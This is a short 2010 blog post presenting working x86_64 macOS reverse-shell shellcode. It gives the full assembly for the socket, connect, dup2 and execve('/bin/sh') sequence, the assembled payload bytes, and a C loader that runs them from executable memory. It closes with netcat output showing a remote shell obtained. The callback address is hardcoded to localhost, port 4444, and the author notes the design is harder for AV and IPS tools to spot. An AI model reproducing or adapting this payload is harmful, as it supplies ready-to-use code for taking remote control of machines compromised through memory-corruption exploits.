| 01 |
02 |
03 |
04 |
05 |
06 |
07 |
08 |
09 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
22-Oct-2010 [18:49] -- x86_64 MacOS X connect() shellcode
Lately I have been researching the exploitation of buffer overflows, user-after-free, etc... but on x86_64 (concretely on MacOSX). I had my sample vulnerable programs, the 100% reliable exploits, etc... but could not find any interesting shellcode for this arch/platform. And you know... and int3 is not that exciting when you want to show this to your friends/family/fans/wife...
So, I had to develop my own one... contains NULL bytes but for my exploitation it did nto matter.
One thing I learnt is that it is way more elegant to write it.. no jmp/call/pop since I use relative rip addressing :) AV, IPS should develop new generic techniques to find shellcodes.
Here we go, the ip and port are hardcoded to (127.0.0.1:4444):
/*
MacOSX x86_64 connect() shellcode
Author: Fermin J. Serna
Twitter: @fjserna
Website: http://zhodiac.hispahack.com
Date: 21/Oct/2010
----
BITS 64
SECTION .text
GLOBAL _start
_start:
; socket = 0x2000061
xor rdi, rdi
inc rdi
inc rdi
xor rsi, rsi
inc rsi
xor rdx, rdx
mov eax, 0x2000061
mov r10, rcx
syscall
push rax ; push sock_fd for later use
; connect = 0x2000062
pop rdi
push rdi
lea rsi, [rel sockaddr_in]
xor rdx, rdx
mov dl, 0x10
mov eax, 0x2000062
mov r10, rcx
syscall
; dup2 = 0x200005a
pop rdi
push rdi
xor rsi, rsi
mov eax, 0x200005a
mov r10, rcx
syscall
; dup2 = 0x200005a
pop rdi
push rdi
xor rsi, rsi
inc rsi
mov eax, 0x200005a
mov r10, rcx
syscall
; dup2 = 0x200005a
pop rdi
push rdi
xor rsi, rsi
inc rsi
inc rsi
mov eax, 0x200005a
mov r10, rcx
syscall
; execve = 0x200003b
lea rdi, [rel cmd]
xor rdx, rdx
push rdx
push rdi
mov rsi, rsp
mov eax, 0x200003b
mov r10, rcx
syscall
; exit = 0x2000001
_exit:
xor rdi, rdi
mov eax, 0x2000001
syscall
sockaddr_in:
dd 0x5c110200 ; port 4444
dd 0x0100007f ; 127.0.0.1
dd 0x00000000
dd 0x00000000
cmd:
db '/bin/sh',0
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
char shellcode[]=
"\\x48\\x31\\xff\\x48\\xff\\xc7\\x48\\xff\\xc7\\x48\\x31\\xf6\\x48\\xff\\xc6\\x48"
"\\x31\\xd2\\xb8\\x61\\x00\\x00\\x02\\x49\\x89\\xca\\x0f\\x05\\x50\\x5f\\x57\\x48"
"\\x8d\\x35\\x68\\x00\\x00\\x00\\x48\\x31\\xd2\\xb2\\x10\\xb8\\x62\\x00\\x00\\x02"
"\\x49\\x89\\xca\\x0f\\x05\\x5f\\x57\\x48\\x31\\xf6\\xb8\\x5a\\x00\\x00\\x02\\x49"
"\\x89\\xca\\x0f\\x05\\x5f\\x57\\x48\\x31\\xf6\\x48\\xff\\xc6\\xb8\\x5a\\x00\\x00"
"\\x02\\x49\\x89\\xca\\x0f\\x05\\x5f\\x57\\x48\\x31\\xf6\\x48\\xff\\xc6\\x48\\xff"
"\\xc6\\xb8\\x5a\\x00\\x00\\x02\\x49\\x89\\xca\\x0f\\x05\\x48\\x8d\\x3d\\x2c\\x00"
"\\x00\\x00\\x48\\x31\\xd2\\x52\\x57\\x48\\x89\\xe6\\xb8\\x3b\\x00\\x00\\x02\\x49"
"\\x89\\xca\\x0f\\x05\\x48\\x31\\xff\\xb8\\x01\\x00\\x00\\x02\\x0f\\x05\\x00\\x02"
"\\x11\\x5c\\x7f\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x2f\\x62"
"\\x69\\x6e\\x2f\\x73\\x68\\x00\\x00";
int main(int argc, char **argv) {
int (*sc)();
void *ptr=(void *)0x0000006000000000;
unsigned int counter;
ptr=mmap(ptr,0x1000,PROT_EXEC|PROT_WRITE|PROT_READ,MAP_FIXED|MAP_ANON|MAP_PRIVATE,0,0);
if (ptr==MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr,shellcode,sizeof(shellcode));
sc=ptr;
sc();
return 0;
}
And the result is:
Fermin-Sernas-MacBook-Pro:x Fer$ nc -lv 4444
id;
uid=501(Fer) gid=20(staff) groups=20(staff),402(com.apple.sharepoint.group.1),204(_developer),100(_lpoperator),98(_lpadmin),81(_appserveradm),80(admin),79(_appserverusr),61(localaccounts),12(everyone),401(com.apple.access_screensharing)
Fermin J. Serna - @fjserna
Comments (0)
